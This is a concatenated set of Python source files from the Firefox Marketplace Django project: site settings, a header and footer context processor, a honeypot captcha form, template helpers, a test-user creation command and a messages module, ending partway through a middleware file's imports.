# --- Core Marketplace site settings, layered on top of lib.settings_base ---

# The origin URL for our Fireplace frontend, from which API requests come.
FIREPLACE_URL = ''

ALLOWED_HOSTS += ['.firefox.com', '.firefox.com.cn']

# We'll soon need a `settings_test_mkt` to override this.
APP_PREVIEW = True

# 403 view to render for CSRF failures.
CSRF_FAILURE_VIEW = 'mkt.site.views.csrf_failure'

# Set log in/log out URLs for redirects to work.
LOGIN_URL = '/login'
LOGOUT_URL = '/logout'

# Let robots tear this place up.
ENGAGE_ROBOTS = True

# Contact addresses for the various Marketplace teams.
MKT_FEEDBACK_EMAIL = '[email protected]'
MKT_REVIEWERS_EMAIL = '[email protected]'
MKT_SENIOR_EDITORS_EMAIL = '[email protected]'
MKT_SUPPORT_EMAIL = '[email protected]'
MARKETPLACE_EMAIL = '[email protected]'
ABUSE_EMAIL = 'Firefox Marketplace Staff <[email protected]>'
NOBODY_EMAIL = 'Firefox Marketplace <[email protected]>'
DEFAULT_FROM_EMAIL = 'Firefox Marketplace <[email protected]>'

# Default app name for our webapp as specified in `manifest.webapp`.
WEBAPP_MANIFEST_NAME = 'Marketplace'

ROOT_URLCONF = 'mkt.urls'

# Marketplace-specific Django apps, appended to AMO's INSTALLED_APPS.
INSTALLED_APPS += (
    'devhub',  # Put here so helpers.py doesn't get loaded first.
    'mkt.site',
    'mkt.account',
    'mkt.api',
    'mkt.collections',
    'mkt.comm',
    'mkt.commonplace',
    'mkt.detail',
    'mkt.developers',
    'mkt.ecosystem',
    'mkt.feed',
    'mkt.files',
    'mkt.fireplace',
    'mkt.inapp',
    'mkt.lookup',
    'mkt.monolith',
    'mkt.operators',
    'mkt.purchase',
    'mkt.ratings',
    'mkt.receipts',
    'mkt.reviewers',
    'mkt.search',
    'mkt.stats',
    'mkt.submit',
    'mkt.zadmin',
    'mkt.webapps',
    'mkt.webpay',
)
# --- Middleware / template / test-runner customizations for Marketplace ---

# Rework AMO's middleware stack: drop mobile detection and AMO's locale
# handling, prepend gzip + cache headers, then append the API stack.
MIDDLEWARE_CLASSES = list(MIDDLEWARE_CLASSES)
MIDDLEWARE_CLASSES.remove('mobility.middleware.DetectMobileMiddleware')
MIDDLEWARE_CLASSES.remove('mobility.middleware.XMobileMiddleware')
MIDDLEWARE_CLASSES.remove('amo.middleware.LocaleAndAppURLMiddleware')
MIDDLEWARE_CLASSES = [
    'mkt.api.middleware.GZipMiddleware',
    'mkt.site.middleware.CacheHeadersMiddleware'
] + MIDDLEWARE_CLASSES

MIDDLEWARE_CLASSES.append('mkt.site.middleware.RequestCookiesMiddleware')
MIDDLEWARE_CLASSES.append('mkt.carriers.middleware.CarrierURLMiddleware')
MIDDLEWARE_CLASSES.remove('commonware.middleware.FrameOptionsHeader')
MIDDLEWARE_CLASSES.remove(
    'django_statsd.middleware.GraphiteRequestTimingMiddleware')
MIDDLEWARE_CLASSES.remove('multidb.middleware.PinningRouterMiddleware')

# We remove this to add it later since it's used after the api auth middleware.
MIDDLEWARE_CLASSES.remove('access.middleware.ACLMiddleware')

MIDDLEWARE_CLASSES += [
    'mkt.site.middleware.RedirectPrefixedURIMiddleware',
    'mkt.api.middleware.RestOAuthMiddleware',
    'mkt.api.middleware.RestSharedSecretMiddleware',
    'access.middleware.ACLMiddleware',
    'mkt.site.middleware.LocaleMiddleware',
    'mkt.regions.middleware.RegionMiddleware',
    'mkt.site.middleware.DeviceDetectionMiddleware',
    'mkt.site.middleware.DoNotTrackTrackingMiddleware',
    'mkt.api.middleware.TimingMiddleware',
    'mkt.api.middleware.APIVersionMiddleware',
    'mkt.api.middleware.CORSMiddleware',
    'mkt.api.middleware.APIPinningMiddleware',
    'mkt.api.middleware.APITransactionMiddleware',
    'mkt.api.middleware.APIFilterMiddleware',
]

TEMPLATE_DIRS += (path('mkt/templates'), path('mkt/zadmin/templates'))
# Swap AMO's context processors for the Marketplace equivalents.
TEMPLATE_CONTEXT_PROCESSORS = list(TEMPLATE_CONTEXT_PROCESSORS)
TEMPLATE_CONTEXT_PROCESSORS.remove('amo.context_processors.global_settings')
TEMPLATE_CONTEXT_PROCESSORS.remove('amo.context_processors.app')
TEMPLATE_CONTEXT_PROCESSORS += [
    'mkt.site.context_processors.global_settings',
    'mkt.carriers.context_processors.carrier_data',
]

# Tests.
NOSE_ARGS = [
    '--with-fixture-bundling',
    '--where=%s' % os.path.join(ROOT, 'mkt')
]

NO_ADDONS_MODULES = (
    'addons.views',
)

# Extend AMO's bundles. Sorry, folks. One day when admin goes away this
# will be easier.
MINIFY_BUNDLES['css'].update(asset_bundles.CSS)
MINIFY_BUNDLES['js'].update(asset_bundles.JS)
# --- Celery routing, media paths and client-side timing keys ---

CELERY_ROUTES.update({
    # Devhub.
    'mkt.developers.tasks.validator': {'queue': 'devhub'},
    'mkt.developers.tasks.fetch_manifest': {'queue': 'devhub'},
    'mkt.developers.tasks.fetch_icon': {'queue': 'devhub'},
    'mkt.developers.tasks.file_validator': {'queue': 'devhub'},

    # Webapps.
    'mkt.webapps.tasks.pre_generate_apk': {'queue': 'devhub'},

    # Images.
    'mkt.developers.tasks.resize_icon': {'queue': 'images'},
    'mkt.developers.tasks.resize_preview': {'queue': 'images'},
})

# Paths.
ADDON_ICONS_DEFAULT_PATH = os.path.join(MEDIA_ROOT, 'img/hub')
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + '/img/hub'

PREINSTALL_CONTACT_EMAIL = '[email protected]'
PREINSTALL_TEST_PLAN_URL = 'docs/app-test-template/v1'
PREINSTALL_TEST_PLAN_PATH = os.path.join(
    MEDIA_ROOT, PREINSTALL_TEST_PLAN_URL + '/en-US.xlsx')
# NOTE(review): os.stat() runs at import time and raises OSError if the test
# plan file is missing — confirm the file ships with every deployment.
PREINSTALL_TEST_PLAN_LATEST = datetime.datetime.fromtimestamp(
    os.stat(PREINSTALL_TEST_PLAN_PATH).st_mtime)

# Path to store webpay product icons.
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'

# Base URL where webpay product icons are served from.
PRODUCT_ICON_URL = MEDIA_URL + '/product-icons'

# Number of days the webpay product icon is valid for.
# After this period, the icon will be re-fetched from its external URL.
# If you change this value, update the docs:
# https://developer.mozilla.org/en-US/docs/Web/Apps/Publishing/In-app_payments
PRODUCT_ICON_EXPIRY = 1

# window.performance keys the client may report back via statsd.
STATSD_RECORD_KEYS = [
    'window.performance.timing.domComplete',
    'window.performance.timing.domInteractive',
    'window.performance.timing.domLoading',
    'window.performance.timing.loadEventEnd',
    'window.performance.timing.responseStart',
    'window.performance.timing.fragment.loaded',
    'window.performance.navigation.redirectCount',
    'window.performance.navigation.type',
]
# --- Third-party integrations, localization and payments settings ---

PISTON_DISPLAY_ERRORS = False

# Key for signing requests to BlueVia for developer registration.
BLUEVIA_SECRET = ''
BLUEVIA_ORIGIN = 'https://opentel20.tidprojects.com'
BLUEVIA_URL = BLUEVIA_ORIGIN + '/en/mozilla/?req='

# Allowed `installs_allowed_from` values for manifest validator.
VALIDATOR_IAF_URLS = ['https://marketplace.firefox.com']

# All JS vendor libraries in this list will be excluded from mozmarket.js.
# For example, if receiptverifier is broken and you need to disable it, add
# 'receiptverifier' to the list. See also mkt/site/views.py.
MOZMARKET_VENDOR_EXCLUDE = []

# When True, mozmarket.js will be served as minified JavaScript.
MINIFY_MOZMARKET = True

# GeoIP server settings
# This flag overrides the GeoIP server functions and will force the
# return of the GEOIP_DEFAULT_VAL
GEOIP_URL = ''
GEOIP_DEFAULT_VAL = 'restofworld'
GEOIP_DEFAULT_TIMEOUT = .2

SENTRY_DSN = None

# A smaller range of languages for the Marketplace.
AMO_LANGUAGES = (
    'bg', 'bn-BD', 'ca', 'cs', 'da', 'de', 'el', 'en-US', 'es', 'fr', 'ga-IE',
    'hr', 'hu', 'it', 'ja', 'ko', 'mk', 'nb-NO', 'nl', 'pl', 'pt-BR', 'ro',
    'ru', 'sk', 'sq', 'sr', 'sr-Latn', 'tr', 'zh-CN', 'zh-TW',
)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])

# Not shown on the site, but .po files exist and these are available on the
# L10n dashboard. Generally languages start here and move into AMO_LANGUAGES.
# This list also enables translation edits.
HIDDEN_LANGUAGES = (
    # List of languages from AMO's settings (excluding mkt's active locales).
    'af', 'ar', 'eu', 'fa', 'fi', 'he', 'id', 'mn', 'pt-PT', 'sl', 'sv-SE',
    'uk', 'vi',

    # The hidden list from AMO's settings:
    'cy',
)

# Update this each time there's a major update.
DEV_AGREEMENT_LAST_UPDATED = datetime.date(2012, 2, 23)

# This is the iss (issuer) for app purchase JWTs.
# It must match that of the pay server that processes nav.mozPay().
# In webpay this is the ISSUER setting.
APP_PURCHASE_KEY = 'marketplace-dev.allizom.org'

# This is the shared secret key for signing app purchase JWTs.
# It must match that of the pay server that processes nav.mozPay().
# In webpay this is the SECRET setting.
APP_PURCHASE_SECRET = ''

# This is the aud (audience) for app purchase JWTs.
# It must match that of the pay server that processes nav.mozPay().
# In webpay this is the DOMAIN setting and on B2G this must match
# what's in the provider whitelist.
APP_PURCHASE_AUD = 'marketplace-dev.allizom.org'

# This is the typ for app purchase JWTs.
# It must match that of the pay server that processes nav.mozPay().
# On B2G this must match a provider in the whitelist.
APP_PURCHASE_TYP = 'mozilla/payments/pay/v1'

# This is the typ for signature checking JWTs.
# This is used to integrate with WebPay.
SIG_CHECK_TYP = 'mozilla/payments/sigcheck/v1'

# This is the base filename of the `.zip` containing the packaged app for the
# consumer-facing pages of the Marketplace (aka Fireplace). Expected path:
# /media/packaged-apps/<path>
MARKETPLACE_GUID = 'e6a59937-29e4-456a-b636-b69afa8693b4'

# The UUID for Yogafire (Tarako Marketplace).
# (`Webapp.objects.get(app_slug='marketplace-package').guid` has been
# carefully set on prod, -dev, and stage.)
YOGAFIRE_GUID = 'f34d3c22-3efe-47ca-803d-6c740da1a851'

# A solitude specific settings that allows you to send fake refunds to
# solitude. The matching setting will have to be on in solitude, otherwise
# it will just laugh at your request.
BANGO_FAKE_REFUNDS = False
# --- Django Rest Framework and miscellaneous API settings ---

REST_FRAMEWORK = {
    'DEFAULT_MODEL_SERIALIZER_CLASS':
        'rest_framework.serializers.HyperlinkedModelSerializer',
    'DEFAULT_AUTHENTICATION_CLASSES': (
        'mkt.api.authentication.RestOAuthAuthentication',
    ),
    'DEFAULT_RENDERER_CLASSES': (
        'mkt.api.renderers.SuccinctJSONRenderer',
    ),
    'DEFAULT_CONTENT_NEGOTIATION_CLASS': (
        'mkt.api.renderers.FirstAvailableRenderer'
    ),
    'DEFAULT_PARSER_CLASSES': (
        'rest_framework.parsers.JSONParser',
        'rest_framework.parsers.FormParser',
        'rest_framework.parsers.MultiPartParser',
    ),
    'DEFAULT_PERMISSION_CLASSES': (
        # By default no-one gets anything. You will have to override this
        # in each resource to match your needs.
        'mkt.api.authorization.AllowNone',
    ),
    'DEFAULT_PAGINATION_SERIALIZER_CLASS':
        'mkt.api.paginator.CustomPaginationSerializer',
    'DEFAULT_FILTER_BACKENDS': (
        'rest_framework.filters.DjangoFilterBackend',
    ),
    'EXCEPTION_HANDLER': 'mkt.api.exceptions.custom_exception_handler',
    'PAGINATE_BY': 25,
    'PAGINATE_BY_PARAM': 'limit'
}

# Tastypie config to match Django Rest Framework.
API_LIMIT_PER_PAGE = 25

# Upon signing out (of Developer Hub/Reviewer Tools), redirect users to
# Developer Hub instead of to Fireplace.
LOGOUT_REDIRECT_URL = '/developers/'

# Name of our Commonplace repositories on GitHub.
COMMONPLACE_REPOS = ['commbadge', 'fireplace', 'marketplace-stats',
                     'rocketfuel']
COMMONPLACE_REPOS_APPCACHED = []

# A list of the payment providers supported by the marketplace. Currently there
# can be only one value, however we expect this to change in the future.
PAYMENT_PROVIDERS = ['bango']

# Grace period for apps to attain a content rating before they get disabled.
IARC_APP_DISABLE_DATE = datetime.datetime(2014, 4, 15)

# Cache responses for 3 minutes (Expires headers).
CACHE_MIDDLEWARE_SECONDS = 60 * 3

# Set Etag headers.
USE_ETAGS = True

# When True, pre-generate APKs for apps, turn off by default.
PRE_GENERATE_APKS = False

# URL to the APK Factory service.
# See https://github.com/mozilla/apk-factory-service
PRE_GENERATE_APK_URL = (
    'https://apk-controller.dev.mozaws.net/application.apk')
########NEW FILE########
__FILENAME__ = context_processors
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core.urlresolvers import reverse
from tower import ugettext as _
import amo
import mkt
from access import acl
from amo.context_processors import get_collect_timings
from zadmin.models import get_config
def global_settings(request):
    """
    Store global Marketplace-wide info. used in the header.

    Builds the template context shared by every page: account menu links,
    developer/reviewer tool links, footer links, and flags such as
    `logged`, `is_admin` and `DESKTOP`.
    """
    account_links = []
    tools_links = []
    footer_links = []
    context = {}

    tools_title = _('Tools')

    # Personalized menus require both an authenticated session and an
    # `amo_user` attached to the request (set by the ACL middleware).
    if request.user.is_authenticated() and getattr(request, 'amo_user', None):
        amo_user = request.amo_user
        context['is_reviewer'] = acl.check_reviewer(request)
        account_links = [
            # TODO: Coming soon with payments.
            # {'text': _('Account History'),
            #  'href': reverse('account.purchases')},
            {'text': _('Account Settings'), 'href': '/settings'},
            {'text': _('Change Password'),
             'href': 'https://login.persona.org/signin'},
            {'text': _('Sign out'), 'href': reverse('users.logout')},
        ]
        # Don't advertise the Developer Hub while already inside it.
        if '/developers/' not in request.path:
            tools_links.append({'text': _('Developer Hub'),
                                'href': reverse('ecosystem.landing')})
            if amo_user.is_developer:
                tools_links.append({'text': _('My Submissions'),
                                    'href': reverse('mkt.developers.apps')})
        if '/reviewers/' not in request.path and context['is_reviewer']:
            footer_links.append({
                'text': _('Reviewer Tools'),
                'href': reverse('reviewers.apps.queue_pending'),
            })
        if acl.action_allowed(request, 'AccountLookup', '%'):
            footer_links.append({'text': _('Lookup Tool'),
                                 'href': reverse('lookup.home')})
        if acl.action_allowed(request, 'Admin', '%'):
            footer_links.append({'text': _('Admin Tools'),
                                 'href': reverse('zadmin.home')})

        # The footer repeats everything from the tools menu.
        tools_links += footer_links
        context['amo_user'] = amo_user
        logged = True
    else:
        context['amo_user'] = AnonymousUser()
        logged = False

    # Tablets get the desktop experience; otherwise fall back on the
    # mobile-detection flag set by the device middleware.
    DESKTOP = (getattr(request, 'TABLET', None) or
               not getattr(request, 'MOBILE', None))

    request.APP = getattr(request, 'APP', None)

    context.update(account_links=account_links,
                   settings=settings,
                   amo=amo, mkt=mkt,
                   APP=amo.FIREFOX,
                   tools_links=tools_links,
                   tools_title=tools_title,
                   footer_links=footer_links,
                   ADMIN_MESSAGE=get_config('site_notice'),
                   collect_timings_percent=get_collect_timings(),
                   is_admin=acl.action_allowed(request, 'Apps', 'Edit'),
                   DESKTOP=DESKTOP,
                   logged=logged)
    return context
########NEW FILE########
__FILENAME__ = forms
from django import forms
import commonware.log
import happyforms
from tower import ugettext as _
log = commonware.log.getLogger('z.mkt.site.forms')
# Choices for when a newly approved app should become public:
# 0 = immediately on approval, 1 = only when the developer flips it manually.
APP_PUBLIC_CHOICES = (
    (0, _('As soon as it is approved.')),
    (1, _('Not until I manually make it public.')),
)
class AddonChoiceField(forms.ModelChoiceField):
    """ModelChoiceField whose choices are labelled with the add-on's name."""

    def label_from_instance(self, obj):
        # Show the add-on name rather than the default unicode(obj).
        return obj.name
class PotatoCaptchaForm(happyforms.Form):
    """Honeypot-style anti-spam form.

    Two hidden fields trap naive bots: ``tuber`` must stay blank and
    ``sprout`` must contain 'potato' (filled in by JavaScript).
    Authenticated users skip the captcha entirely.
    """

    # Honeypot: real users leave this blank (spammers are dumb).
    tuber = forms.CharField(
        required=False, label='',
        widget=forms.TextInput(attrs={'class': 'potato-captcha'}))
    # Filled in with 'potato' by JS; bots without JS miss it.
    sprout = forms.CharField(
        required=False, label='',
        widget=forms.TextInput(attrs={'class': 'potato-captcha'}))

    def __init__(self, *args, **kwargs):
        self.request = kwargs.pop('request')
        super(PotatoCaptchaForm, self).__init__(*args, **kwargs)
        # Authenticated users already proved they are human, so the
        # honeypot fields are removed from the form.
        authenticated = self.request.user.is_authenticated()
        self.has_potato_recaptcha = not authenticated
        if authenticated:
            del self.fields['tuber']
            del self.fields['sprout']

    def clean(self):
        # Bail out early if field-level validation already failed.
        if self.errors:
            return
        data = self.cleaned_data
        if self.has_potato_recaptcha:
            tuber_filled = bool(data.get('tuber'))
            sprout_wrong = data.get('sprout') != 'potato'
            if tuber_filled or sprout_wrong:
                ip = self.request.META.get('REMOTE_ADDR', '')
                log.info(u'Spammer thwarted: %s' % ip)
                raise forms.ValidationError(_('Form could not be submitted.'))
        return data
class AbuseForm(PotatoCaptchaForm):
    """Abuse-report form: a required free-text field plus the potato captcha."""

    text = forms.CharField(widget=forms.Textarea, label='', required=True)
########NEW FILE########
__FILENAME__ = helpers
import json
from django.conf import settings
import commonware.log
import jinja2
from jingo import env, register
from jingo_minify import helpers as jingo_minify_helpers
from tower import ugettext as _
from amo.helpers import urlparams
from amo.urlresolvers import get_outgoing_url, reverse
from translations.helpers import truncate
log = commonware.log.getLogger('z.mkt.site')
@jinja2.contextfunction
@register.function
def css(context, bundle, media=False, debug=None):
    """Render the link tags for a CSS bundle via jingo-minify.

    ``debug=None`` falls back to settings.TEMPLATE_DEBUG; a ?debug=true
    query string forces unminified CSS for testing on -dev/prod.
    """
    use_debug = settings.TEMPLATE_DEBUG if debug is None else debug
    if context['request'].GET.get('debug'):
        use_debug = True
    return jingo_minify_helpers.css(bundle, media, use_debug)
@jinja2.contextfunction
@register.function
def js(context, bundle, debug=None, defer=False, async=False):
    """Render the script tags for a JS bundle via jingo-minify.

    NOTE(review): `async` became a reserved word in Python 3.7; the
    parameter name is kept as-is since this is Python 2 code and templates
    pass it by keyword.
    """
    if debug is None:
        debug = settings.TEMPLATE_DEBUG
    # ?debug=true gives you unminified JS for testing on -dev/prod.
    if context['request'].GET.get('debug'):
        debug = True
    return jingo_minify_helpers.js(bundle, debug, defer, async)
@jinja2.contextfunction
@register.function
def get_media_hash(context):
    """Return the JS build ID concatenated with the CSS build ID."""
    js_build = jingo_minify_helpers.BUILD_ID_JS
    css_build = jingo_minify_helpers.BUILD_ID_CSS
    return js_build + css_build
def new_context(context, **kw):
    """Return a shallow copy of ``context`` updated with ``kw``.

    The original mapping is left untouched.
    """
    merged = dict(context.items())
    merged.update(kw)
    return merged
@register.function
def no_results():
    """Render the standard "No results found" snippet. That's all."""
    template = env.get_template('site/helpers/no_results.html')
    return jinja2.Markup(template.render())
@jinja2.contextfunction
@register.function
def market_button(context, product, receipt_type=None, classes=None):
    """Render the install/purchase button for a webapp.

    Only renders when ``product.is_webapp()`` is true (returns None
    otherwise).  ``receipt_type == 'reviewer'`` requests the reviewer
    manifest URL.
    """
    request = context['request']
    if product.is_webapp():
        purchased = False
        classes = (classes or []) + ['button', 'product']
        reviewer = receipt_type == 'reviewer'
        data_attrs = {'manifest_url': product.get_manifest_url(reviewer),
                      'is_packaged': json.dumps(product.is_packaged)}
        installed = None
        if request.amo_user:
            installed_set = request.amo_user.installed_set
            installed = installed_set.filter(addon=product).exists()
        # Handle premium apps.
        if product.has_premium():
            # User has purchased app.
            purchased = (request.amo_user and
                         product.pk in request.amo_user.purchase_ids())
            # App authors are able to install their apps free of charge.
            if (not purchased and
                request.check_ownership(product, require_author=True)):
                purchased = True
        # Installed, purchased, or free apps show "Install"; otherwise the
        # button shows the price tier.
        if installed or purchased or not product.has_premium():
            label = _('Install')
        else:
            label = product.get_tier_name()
        # Free apps and purchased apps get active install buttons.
        if not product.is_premium() or purchased:
            classes.append('install')
        c = dict(product=product, label=label, purchased=purchased,
                 data_attrs=data_attrs, classes=' '.join(classes))
        t = env.get_template('site/helpers/webapp_button.html')
        return jinja2.Markup(t.render(c))
def product_as_dict(request, product, purchased=None, receipt_type=None,
                    src=''):
    """Serialize a webapp into the dict consumed by client-side install JS.

    All values are HTML-escaped except for a whitelist of keys whose
    native types (bools/lists/dicts) must survive JSON encoding.
    """
    # Dev environments might not have authors set.
    author = ''
    author_url = ''
    if product.listed_authors:
        author = product.listed_authors[0].name
        author_url = product.listed_authors[0].get_url_path()
    # Reviewer receipts are issued from a dedicated endpoint.
    receipt_url = (reverse('receipt.issue', args=[product.app_slug]) if
                   receipt_type else product.get_detail_url('record'))
    token_url = reverse('generate-reviewer-token', args=[product.app_slug])
    src = src or request.GET.get('src', '')
    reviewer = receipt_type == 'reviewer'
    ret = {
        'id': product.id,
        'name': product.name,
        'categories': [unicode(cat.slug) for cat in
                       product.categories.all()],
        'manifest_url': product.get_manifest_url(reviewer),
        'recordUrl': urlparams(receipt_url, src=src),
        'tokenUrl': token_url,
        'author': author,
        'author_url': author_url,
        'iconUrl': product.get_icon_url(64),
        'is_packaged': product.is_packaged,
        'src': src
    }
    # Add in previews to the dict.
    if product.all_previews:
        previews = []
        for p in product.all_previews:
            preview = {
                'fullUrl': jinja2.escape(p.image_url),
                'type': jinja2.escape(p.filetype),
                'thumbUrl': jinja2.escape(p.thumbnail_url),
            }
            previews.append(preview)
        ret.update({'previews': previews})
    # Price info (and purchase state, for logged-in users) only applies to
    # premium apps.
    if product.premium:
        ret.update({
            'price': product.get_price(region=request.REGION.id),
            'priceLocale': product.get_price_locale(region=request.REGION.id),
        })
        if request.amo_user:
            ret['isPurchased'] = purchased
    # Jinja2 escape everything except this whitelist so that bool is retained
    # for the JSON encoding.
    wl = ('categories', 'currencies', 'isPurchased', 'is_packaged', 'previews',
          'price', 'priceLocale')
    return dict([k, jinja2.escape(v) if k not in wl else v]
                for k, v in ret.items())
@register.function
@jinja2.contextfunction
def mkt_breadcrumbs(context, product=None, items=None, crumb_size=40,
                    add_default=True, cls=None):
    """
    Wrapper function for ``breadcrumbs``.
    **items**
        list of [(url, label)] to be inserted after Add-on.
    **product**
        Adds the App/Add-on name to the end of the trail.  If items are
        specified then the App/Add-on will be linked.
    **add_default**
        Prepends trail back to home when True.  Default is True.
    **crumb_size**
        Maximum label length before truncation.  Default is 40.
    **cls**
        Extra CSS class passed through to the breadcrumbs template.
    """
    if add_default:
        crumbs = [(reverse('home'), _('Home'))]
    else:
        crumbs = []
    if product:
        if items:
            url_ = product.get_detail_url()
        else:
            # The Product is the end of the trail.
            url_ = None
        crumbs += [(None, _('Apps')), (url_, product.name)]
    if items:
        crumbs.extend(items)
    # A lone "Home" crumb is pointless; render nothing in that case.
    if len(crumbs) == 1:
        crumbs = []
    crumbs = [(u, truncate(label, crumb_size)) for (u, label) in crumbs]
    t = env.get_template('site/helpers/breadcrumbs.html').render(
        {'breadcrumbs': crumbs, 'cls': cls})
    return jinja2.Markup(t)
@register.function
def form_field(field, label=None, tag='div', req=None, opt=False, hint=False,
               tooltip=False, some_html=False, cc_startswith=None, cc_for=None,
               cc_maxlength=None, grid=False, cls=None, validate=False):
    """Render a single bound form field with the simple_field template.

    ``label`` defaults to the field's own label; ``validate`` adds an HTML5
    ``required`` attribute for required fields so the browser can validate.
    """
    attrs = {}
    if validate and field.field.required:
        # Add a `required` attribute so we can do form validation.
        # TODO(cvan): Write tests for kumar some day.
        attrs['required'] = ''
    render_ctx = {
        'field': field,
        'label': label or field.label,
        'tag': tag,
        'req': req,
        'opt': opt,
        'hint': hint,
        'tooltip': tooltip,
        'some_html': some_html,
        'cc_startswith': cc_startswith,
        'cc_for': cc_for,
        'cc_maxlength': cc_maxlength,
        'grid': grid,
        'cls': cls,
        'attrs': attrs,
    }
    rendered = env.get_template(
        'site/helpers/simple_field.html').render(render_ctx)
    return jinja2.Markup(rendered)
@register.function
def grid_field(field, label=None, tag='div', req=None, opt=False, hint=False,
               some_html=False, cc_startswith=None, cc_maxlength=None,
               validate=False):
    """Render a form field on the grid layout (``form_field`` with grid=True).

    BUG FIX: ``form_field`` also takes ``tooltip`` and ``cc_for`` parameters
    that this wrapper does not expose.  The previous positional call silently
    shifted ``some_html`` into ``tooltip``, ``cc_startswith`` into
    ``some_html`` and ``cc_maxlength`` into ``cc_for``.  Passing everything
    by keyword routes each argument to the parameter it was named for.
    """
    return form_field(field, label=label, tag=tag, req=req, opt=opt,
                      hint=hint, some_html=some_html,
                      cc_startswith=cc_startswith, cc_maxlength=cc_maxlength,
                      grid=True, validate=validate)
@register.filter
@jinja2.contextfilter
def timelabel(context, time):
    """Render ``time`` with the shared timelabel template snippet."""
    template = env.get_template('site/helpers/timelabel.html')
    return jinja2.Markup(template.render({'time': time}))
@register.function
def mkt_admin_site_links():
    """Return the grouped (label, url) navigation links for admin pages."""
    addon_links = [
        ('Fake mail', reverse('zadmin.mail')),
    ]
    user_links = [
        ('Configure groups', reverse('admin:access_group_changelist')),
    ]
    settings_links = [
        ('View site settings', reverse('zadmin.settings')),
        ('Django admin pages', reverse('zadmin.home')),
    ]
    tool_links = [
        ('View request environment', reverse('amo.env')),
        ('View elasticsearch settings', reverse('zadmin.elastic')),
        ('Purge data from memcache', reverse('zadmin.memcache')),
        ('Purge pages from zeus', reverse('zadmin.hera')),
        ('Generate error', reverse('zadmin.generate-error')),
        ('Site Status', reverse('amo.monitor')),
        ('Force Manifest Re-validation',
         reverse('zadmin.manifest_revalidation')),
    ]
    return {
        'addons': addon_links,
        'users': user_links,
        'settings': settings_links,
        'tools': tool_links,
    }
@register.filter
def external_href(url):
    """Build target/href attributes routing ``url`` through the outgoing-link bouncer."""
    attrs = 'target="_blank" href="%s"' % get_outgoing_url(unicode(url))
    return jinja2.Markup(attrs)
@register.filter
def more_button(pager):
    """Render the "more results" pagination button for ``pager``."""
    template = env.get_template('site/paginator.html')
    return jinja2.Markup(template.render({'pager': pager}))
@register.function
@jinja2.contextfunction
def get_doc_template(context, template):
    """Render a localizable document template, falling back to en-US.

    Looks for ``<template>/<lang>.html`` when the request language is
    enabled; otherwise (or when that template is missing) renders
    ``<template>/en-US.html``.
    """
    lang = getattr(context['request'], 'LANG', 'en-US')
    if lang in settings.AMO_LANGUAGES:
        try:
            localized = env.get_template('%s/%s.html' % (template, lang))
        except jinja2.TemplateNotFound:
            pass
        else:
            return jinja2.Markup(localized.render())
    fallback = env.get_template('%s/en-US.html' % template)
    return jinja2.Markup(fallback.render())
@register.function
@jinja2.contextfunction
def get_doc_path(context, path, extension):
    """
    Gets the path to a localizable document in the current language with
    fallback to en-US.

    BUG FIX: the previous version only returned the en-US fallback when the
    localized file raised IOError; when the request language was not in
    AMO_LANGUAGES it fell through and returned None.  The fallback is now
    the unconditional last resort.
    """
    lang = getattr(context['request'], 'LANG', 'en-US')
    if lang in settings.AMO_LANGUAGES:
        try:
            localized_file_path = '%s/%s.%s' % (path, lang, extension)
            # Opening the file (and closing it immediately) is just an
            # existence check for the localized document.
            with open(localized_file_path):
                return localized_file_path
        except IOError:
            pass
    return '%s/en-US.%s' % (path, extension)
########NEW FILE########
__FILENAME__ = add_test_users
import hashlib
from datetime import datetime
from optparse import make_option
from django.conf import settings
from django.core.management.base import BaseCommand
from django.db import transaction
import amo
from access.models import Group, GroupUser
from apps.users.models import UserProfile
from mkt.api.models import Access
@transaction.commit_on_success
def create_user(email, password, group_name=None, overwrite=False):
    """Create a user if they don't exist already, assign them to a group and
    create an API token for them.
    On token creation, we generate the token key and the token secret. Each of
    them are generated in a predictable way: sha512(password + email + 'key')
    or sha512(password + email + 'secret').
    """
    # Create the user.
    profile, created = UserProfile.objects.get_or_create(
        username=email, email=email, source=amo.LOGIN_SOURCE_UNKNOWN,
        display_name=email)
    if created:
        profile.create_django_user()
    if not profile.read_dev_agreement:
        # Mark the dev agreement as read so the account can act as a
        # developer immediately.
        profile.read_dev_agreement = datetime.now()
        profile.save()
    # Now, find the group we want.
    if (group_name and not
        profile.groups.filter(groupuser__group__name=group_name).exists()):
        group = Group.objects.get(name=group_name)
        GroupUser.objects.create(group=group, user=profile)
    # We also want to grant these users access, so let's create tokens for
    # them.
    if overwrite:
        Access.objects.filter(user=profile.user).delete()
    if not Access.objects.filter(user=profile.user).exists():
        # Deterministic credentials so test scripts can re-derive them.
        key = hashlib.sha512(password + email + 'key').hexdigest()
        secret = hashlib.sha512(password + email + 'secret').hexdigest()
        Access.objects.create(key=key, secret=secret, user=profile.user)
class Command(BaseCommand):
    help = """Create users with different profiles (App Review, Admin,
              Developer, End User)
           """
    option_list = BaseCommand.option_list + (
        make_option(
            '--clear', action='store_true', dest='clear', default=False,
            help='Clear the user access tokens before recreating them'),)
    def handle(self, *args, **kw):
        # All generated accounts share the password from settings.
        options = {'password': settings.API_PASSWORD}
        if kw['clear']:
            # --clear deletes and regenerates the API access tokens.
            options['overwrite'] = True
        create_user('[email protected]', group_name='App Reviewers',
                    **options)
        create_user('[email protected]', group_name='Admins', **options)
        create_user('[email protected]', **options)
        create_user('[email protected]', **options)
########NEW FILE########
__FILENAME__ = messages
import jinja2
from jingo import env
from tower import ugettext as _
from amo.messages import debug, info, success, warning, error
def _make_message(message=None, title=None, title_safe=False,
                  message_safe=False):
    """Render the shared message-content template as safe markup.

    The ``*_safe`` flags tell the template not to escape the corresponding
    piece of text.
    """
    render_ctx = {'title': title, 'title_safe': title_safe,
                  'message': message, 'message_safe': message_safe}
    rendered = env.get_template('site/messages/content.html').render(
        render_ctx)
    return jinja2.Markup(rendered)
def form_errors(request):
    """Flash the standard "Errors Found" message for an invalid form."""
    title = _('Errors Found')
    message = _('There were errors in the changes you made. '
                'Please correct them and resubmit.')
    return error(request, title=title, message=message)
########NEW FILE########
__FILENAME__ = middleware
from types import MethodType
from django import http
from django.conf import settings
from django.http import HttpRequest, SimpleCookie
from django.utils.cache import (get_max_age, patch_cache_control,
patch_response_headers, patch_vary_headers)
import tower
from django_statsd.clients import statsd
import amo
